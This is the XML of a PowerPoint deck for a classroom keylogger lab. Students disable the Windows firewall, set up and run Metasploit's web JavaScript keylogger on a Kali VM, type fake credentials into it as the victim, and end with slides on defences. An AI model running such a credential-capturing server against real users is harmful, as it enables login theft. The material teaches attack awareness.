              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Set the server host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set SRVHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Kali_IP_Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Run the keylogger attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Notice that the server has started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4C2F4A-2C01-4F30-A325-46F83C354A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2802739"/>
            <a:ext cx="4476874" cy="1210106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" sx="102000" sy="102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508715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9EAF9-D8D4-4D30-99F7-0DDBDC767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Starting the Keylogger Attack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18363-64F5-467F-81C0-142B182933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Break/Stop the server by pressing CTRL+C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Now, set the URI path the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>gmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set URIPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Run the capture again:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Write down the URL the server is currently using. It should look like the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>http://10.1.57.93:1717/gmail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21184549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F22F6-24FF-434A-98B0-4796DE569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Playing the Victim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884E43-1F99-4AEE-B654-C64ED2C3DD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2136"/>
            <a:ext cx="5680710" cy="3763784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In the Windows environment, open the Chrome Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Go the website of the URL you wrote down.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Add “/demo” to the end of this URL.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It should look something like the following</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>http://10.1.57.93:1717/gmail/demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>You should see a "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Demo Form" page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3D060D-1139-489B-B029-AF996892D0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5811" y="2852680"/>
            <a:ext cx="3095863" cy="1442695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" sx="102000" sy="102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571640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EED0B-DA85-478B-983E-42CE349D6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Playing the Victim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17FD32-F174-4F9B-AC24-75F280513A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Now, type in fake credentials to this webpage as if you were going to log into a website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5B71B4-2870-43C1-AA7F-3ACCB63756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615" y="2774977"/>
            <a:ext cx="3912567" cy="1791828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" sx="102000" sy="102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5029177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EED0B-DA85-478B-983E-42CE349D6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Seeing the Attack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17FD32-F174-4F9B-AC24-75F280513A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 back to Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notice it has been recording </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> keystroke!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831FEB-F131-48E2-8207-79FFBA900A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3514" y="2917900"/>
            <a:ext cx="3636972" cy="2498952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" sx="102000" sy="102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9043048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E4E87-2A74-4FE9-B099-0CCD360E3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8413750" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to Defend Against a Keylogger?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3668D7-A838-4E1A-96D5-90119D5234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8"/>
            <a:ext cx="8332470" cy="3823332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Only use credentials at trusted websites!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What was the website URL you entered your credentials in?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Watch for "watering hole" type attacks at sites that look similar to your intended destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid re-using passwords across multiple websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If one site steals your password once and they're all the same...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a firewall!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember you disabled the firewall at the beginning of this lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewalls help prevent malicious software from sending out data without you knowing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two-Factor Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why would these help secure your password?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are some other ways of defending against a keylogger attack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309114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FEC5D-874C-4E49-A174-F0DBE89B4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Keylogger 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395898-58A1-4A8D-B78E-01227EFE5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Materials needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kali Linux Virtual Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 7 Virtual Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Tools used (both from Kali Linux OS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web JavaScript Keylogger Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34493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79756-3C0E-4C4C-8F65-1B64191B7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Objectives Covered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FD7ACC-7C5D-4DE2-8122-25A92276CE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Security+ Objectives (SY0-501)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Objective 1.1 – Given a scenario, analyze indicators of compromise and determine the type of malware </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Keylogger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DHS CAE Units</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CTH – Describe different types of attacks and their characteristics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468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FB2D6-DDCF-4D4B-B61A-2ED3C126E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a Keylogger Attack?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20D8FE-5958-4695-9408-98B27A5465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8"/>
            <a:ext cx="7886700" cy="3924932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recording all the keys being pressed on a keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An example, a keylogger captures the following keys pressed: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250" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2025" b="1" dirty="0"/>
              <a:t>www.chase.com&lt;ENTER&gt;jdimon56&lt;TAB&gt;@pp13s33d&lt;ENTER&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>What bank does this person use? What are their login credentials?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114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AEE3E-6FA8-4670-BC5C-02EF915A3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Keylogger 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C25B94-29D5-48B2-A6F8-F9E7433E21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Setup VM environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initialize Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start the keylogger attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Play the victim (in Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observe the attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186350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55CF9-DA0B-4561-B4FE-831DD8A68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Setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environments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2D4D37-B430-4CF2-B9E8-21045B8A2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888" y="1692136"/>
            <a:ext cx="7886700" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log into your range</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open the Kali Linux and Windows 7 Environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You should be on your Kali Linux Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You should also be on your Windows 7 Desktop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin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9736171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5011C-DF78-4134-94E1-CA748AC5D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 Environments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17A967-D208-49EC-A308-21F7E5073E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Change your network location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click on the Windows Start button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search for “Network”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open the Network and Sharing Center program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Under you Network #, click on the “Public Network”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select the “Home Network” option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This disables the Windows Firewall and allows the attack.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AEF647-7A77-4287-B567-506ECCADAB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1243" y="1294011"/>
            <a:ext cx="2315905" cy="1658188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" sx="102000" sy="102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52061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447EC-31E7-4056-AF66-8CA24552A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8373110" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the IP Address (Kali Machine)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C8B5DB-6E54-4C75-99F7-D5B8780846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886278"/>
            <a:ext cx="8180071" cy="3762682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>You will need the IP address of the Kali machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Open the Terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>In the Linux VM, open the Terminal and type the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>hostname -I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This will display the IP Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Write down the Kali VM IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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DBC0E2-34A1-4AB1-96B1-B76907D7A8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5981" y="3179893"/>
            <a:ext cx="4062739" cy="773855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" sx="102000" sy="102000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prst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921BD53-5F4A-45C7-8DA1-06845E118AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276669" y="4416621"/>
            <a:ext cx="1742492" cy="21159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9050" tIns="19050" rIns="19050" bIns="19050" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="309563">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The IP Address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F306AE7-F1AE-450B-A06D-3FD65543C22B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5764607" y="3623455"/>
            <a:ext cx="1383308" cy="793166"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="635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12743082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5E783C54-EF28-49CB-A1ED-E685E68B3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Find the IP Address (Windows Machine)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47CC0EAA-8902-44F4-B765-A4CF667891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98" dirty="0"/>
              <a:t>Select the Start button (Windows Machine) and search for “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t> (Command Prompt)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>Use the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1688" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ipconfig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>Search for the IPv4 Address line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>Write down the Windows IP Address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E1E1980-6C76-4CFD-9804-B41DBC54D6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6546" y="3934197"/>
            <a:ext cx="2244153" cy="2830312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" sx="102000" sy="102000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effec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1296200-6058-4FB1-8349-7E88482E59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8225" y="3326190"/>
            <a:ext cx="3637125" cy="2244893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" sx="102000" sy="102000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst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8A3E23B3-00F4-43DB-8458-CC31684F2E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6775769" y="4337449"/>
            <a:ext cx="795213" cy="243446"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="254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defTabSz="290215">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1125" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue Medium"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Neue Medium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1239330-1719-457A-BF81-F68DB2EF0028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6916517" y="5799088"/>
            <a:ext cx="1298240" cy="1875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7859" tIns="17859" rIns="17859" bIns="17859" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" defTabSz="290215">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="984" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows IP Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="984" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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088D69F-A4EA-4E00-AE3F-98B4DF1B06DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7346935" y="4587241"/>
            <a:ext cx="218703" cy="1142061"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="635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2073194168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20</TotalTime>
  <Words>742</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>117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8" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Circe Light</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Helvetica Neue Medium</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Berlin</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Keylogger Lab</vt:lpstr>
      <vt:lpstr>Objectives Covered</vt:lpstr>
      <vt:lpstr>What is a Keylogger Attack?</vt:lpstr>
      <vt:lpstr>The Keylogger Lab</vt:lpstr>
      <vt:lpstr>Setup Environments</vt:lpstr>
      <vt:lpstr>Setup Environments</vt:lpstr>
      <vt:lpstr>Find the IP Address (Kali Machine)</vt:lpstr>
      <vt:lpstr>Find the IP Address (Windows Machine)</vt:lpstr>
      <vt:lpstr>Initialize Metasploit</vt:lpstr>
      <vt:lpstr>Initialize Metasploit</vt:lpstr>
      <vt:lpstr>Start the Keylogger Attack</vt:lpstr>
      <vt:lpstr>Start the Keylogger Attack</vt:lpstr>
      <vt:lpstr>Starting the Keylogger Attack</vt:lpstr>
      <vt:lpstr>Playing the Victim</vt:lpstr>
      <vt:lpstr>Playing the Victim</vt:lpstr>
      <vt:lpstr>Seeing the Attack</vt:lpstr>
      <vt:lpstr>How to Defend Against a Keylogger?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CIC and NICERC Overview</dc:title>
  <cp:lastModifiedBy>Richard Greene</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T18:02:03Z</dcterms:modified>
</cp:coreProperties>
</file>